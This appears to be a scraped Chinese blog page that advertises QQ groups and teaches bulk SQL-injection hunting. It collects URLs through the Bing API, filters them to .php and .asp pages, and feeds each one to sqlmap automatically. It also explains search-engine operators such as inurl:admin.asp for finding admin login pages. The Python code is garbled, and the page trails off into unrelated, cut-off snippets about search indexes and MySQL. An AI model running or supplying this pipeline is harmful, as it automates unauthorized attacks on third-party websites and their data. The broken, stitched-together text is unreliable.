商業聯盟 qq群538250800
技術搞事 qq群599020441
解決方案 qq群152889761
加入我們 qq群649347320
共享學習 qq群674240731
紀年科技aming
網路安全 ,深度學習,嵌入式,機器強化,生物智慧型,生命科學。
利用現有的搜尋引擎api以及googlehacking技術 ,
批量進行關鍵字查詢和注入點檢測
#分為三步 :
url採集
對採集到的不可能的url進行過濾 , 例如靜態的頁面等
注入點檢測
url採集 :
利用bing提供的免費api , 進行url採集 : (bing.py)
對靜態頁面等url進行過濾
#!/usr/bin/env python
#coding:utf8
file
=open
("urls.txt"
,"r"
)for line in
file
: content = line[0:
-1]if content.endswith(
"html"):
continue
if content.endswith(
"htm"):
continue
if".php"
in content or
".asp"
in content:
print content
檢測注入點 :
#!/usr/bin/env python
#coding:utf8
import os
import sys
file
=open
(sys.ar**[1]
,"r"
)for line in
file
: url = line[0:
-1]print
"*******************"
command =
"sqlmap.py -u "
+ url +
" --random-agent -f --batch --answer=\"extending=n,follow=n,keep=n,exploit=n\""
print
"exec : "
+ command
os.system(command)
搜尋引擎語法完全匹配搜尋——精確匹配 「」 引號 和書名號《》
查詢詞很長 ,baidu分析過後 可能是拆分
把包含引號部分 作為整體 順序匹配 來搜尋
± 加減號的用法
加號 同時包含兩個關鍵字 相當於空格和and。
減號 搜尋結果中不含特定查詢詞 —— 前面必須是空格 後面緊連著需要排除的詞
eg:「seo or 深圳seo」
可能出現其中的乙個關鍵字,也可能兩個都出現。
「seo or 你的名字」(這裡不加引號)。
如果你的名字為常見名。你會發現意外的驚喜,和你同名同姓的居然還有同行業。
「seo or 深圳seo」(這裡不加引號) 就發現了和同名同姓的,還跟我同行。
intitle
eg:(搜的時候不加引號)
「intitle:管理登入」
「新疆 intitle:雪菊」
「網路推廣 intitle:他的名字」
intext和 allintext (針對google有效)
在網頁的內容**現,而不是標題,
eg:「深圳seo intext:seo」
inurl
eg:搜尋登入位址,可以這樣寫「inurl:admin.asp」,
想搜尋discuz的論壇,可以輸入inurl:forum.php,
「csdn部落格 inurl:py_shell」
site
搜尋特定網頁
看搜尋引擎收錄了多少頁面。
——某個站點中有自己需要找的東西,就可以把搜尋範圍限定在這個站點中
「胡歌 空格 insite:www.sina.com.cn」
link
搜尋你想要的電子書,限定在指定文件格式中
eg:「python教程 filetype:pdf」
doc檔案,就寫「filetype:doc」,
「seo filetype:doc」,(搜的時候不加引號) ,
allintitle 包含多組關鍵字
allinurl
linkdomain (雅虎)
某網域名稱反向鏈結 排除 得到外部鏈結
linkdomain: ***.com -***.com
a|b 包含a或者b
搜尋引擎 索引
正排索引 文件編號,單詞編號,單詞的數量,單詞出現的位置。倒排索引 1,單詞詞典,儲存單詞以及統計資訊,單詞在記錄表中的便宜,可常駐記憶體,用雜湊表儲存。2,記錄表,單詞對應的文件集合,記錄單詞出現的數目 位置。文件採用差分變長編碼。其中文件可按編號公升序排列 可利用差分編碼 也可按出現次數排列,可...
MySQL搜尋引擎程式 mysql搜尋引擎
mysql是我們比較常用的一種資料庫軟體。它有著諸多的優點,如開源的,免費的等等。其實它還有乙個很好的特點,那就是有多種引擎可以供你選擇。如果賽車手能根據不同的路況,地形隨手更換與之最適宜的引擎,那麼他們將創造奇蹟。然而目前他們還做不到那樣便捷的更換引擎,但是我們卻可以 所謂知己知彼方可百戰不殆,要...
搜尋引擎 倒排索引
本節通過引入簡單例項,介紹與搜尋引擎索引有關的一些基礎概念,了解這些基礎概念對於後續深入了解索引的工作機制非常重要。3.1.1單詞 文件矩陣 單詞 文件矩陣是表達兩者之間所具有的一種包含關係的概念模型,圖3 1展示了其含義。圖3 1的每列代表乙個文件,每行代表乙個單詞,打對勾的位置代表包含關係。圖3...